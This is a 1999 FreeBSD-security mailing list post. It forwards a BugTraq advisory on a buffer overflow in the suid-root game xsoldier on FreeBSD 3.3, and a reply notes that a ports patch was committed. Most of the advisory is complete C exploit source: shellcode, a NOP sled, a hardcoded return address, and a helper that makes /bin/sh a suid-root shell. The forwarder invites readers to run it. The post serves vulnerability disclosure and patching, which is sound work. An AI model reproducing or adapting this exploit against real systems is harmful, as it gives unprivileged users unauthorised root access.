Date: Thu, 16 Dec 1999 00:11:21 -0500 (EST) From: Spidey <beaupran@iro.umontreal.ca> To: Chris England <cengland@obscurity.org> Cc: freebsd-security@FreeBSD.ORG Subject: Re: From BugTraq - FreeBSD 3.3 xsoldier root exploit (fwd) Message-ID: <14424.29817.586093.109020@anarcat.dyndns.org> References: <Pine.BSO.4.10.9912152030130.29021-100000@obscurity.org>
index | next in thread | previous in thread | raw e-mail
A patch has been commited today in the ports collection. I have not
tested either of the patched and un-patched proggies...
The AnarCat
--- Big Brother told Chris England to write, at 20:36 of December 15:
> I personally have not tested this. I'm not too big on games, but I would
> recommend anyone who has this game installed suid-root to test the snippet
> code against it and post the results to this list.
>
> Cheers,
> -Chris England
>
>
> ---------- Forwarded message ----------
> Date: Wed, 15 Dec 1999 17:11:36 MST
> From: Brock Tellier <btellier@USA.NET>
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: FreeBSD 3.3 xsoldier root exploit
>
> Greetings,
>
> OVERVIEW
> A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
> access. This user does not have to have a valid $DISPLAY to exploit this.
>
> BACKGROUND
> Only FreeBSD 3.3-RELEASE has been tested. xsoldier, suid-root by default, was
> installed as part of the X11 games packages via /stand/sysinstall.
>
> DETAILS
> More problems with FreeBSD 3.3 ports. This time with xsoldier, a suid-root
> game. A simple overflow in the -display option allows any user to gain root.
> Although xsoldier only runs under X, a long -display arg on the CL will allow
> us to gain root.
>
> --- xsoldierx.c ---
> /*
> * xsoldier exploit for Freebsd-3.3-RELEASE
> * Drops a suid root shell in /bin/sh
> * Brock Tellier btellier@usa.net
> */
>
>
> #include <stdio.h>
>
> char shell[]= /* mudge@l0pht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
>
> #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
>
> void buildui() {
> FILE *fp;
> char cc[100];
> fp = fopen("/tmp/ui.c", "w");
> fprintf(fp, CODE);
> fclose(fp);
> snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
> system(cc);
> }
>
> main (int argc, char *argv[] ) {
> int x = 0;
> int y = 0;
> int offset = 0;
> int bsize = 4400;
> char buf[bsize];
> int eip = 0xbfbfdb65; /* works for me */
> buildui();
>
> if (argv[1]) {
> offset = atoi(argv[1]);
> eip = eip + offset;
> }
> fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
> <btellier@usa.net>\n");
> fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
> fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>
> for ( x = 0; x < 4325; x++) buf[x] = 0x90;
> fprintf(stderr, "NOPs to %d\n", x);
>
> for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
> fprintf(stderr, "Shellcode to %d\n",x);
>
> buf[x++] = eip & 0x000000ff;
> buf[x++] = (eip & 0x0000ff00) >> 8;
> buf[x++] = (eip & 0x00ff0000) >> 16;
> buf[x++] = (eip & 0xff000000) >> 24;
> fprintf(stderr, "eip to %d\n",x);
>
> buf[bsize]='\0';
>
> execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
>
> }
>
> -------
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> btellier@usa.net
>
> ____________________________________________________________________
> Get free email and a permanent address at http://www.netaddress.com/?N=1
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
--
Si l'image donne l'illusion de savoir
C'est que l'adage pretend que pour croire,
L'important ne serait que de voir
Lofofora
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
help
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?14424.29817.586093.109020>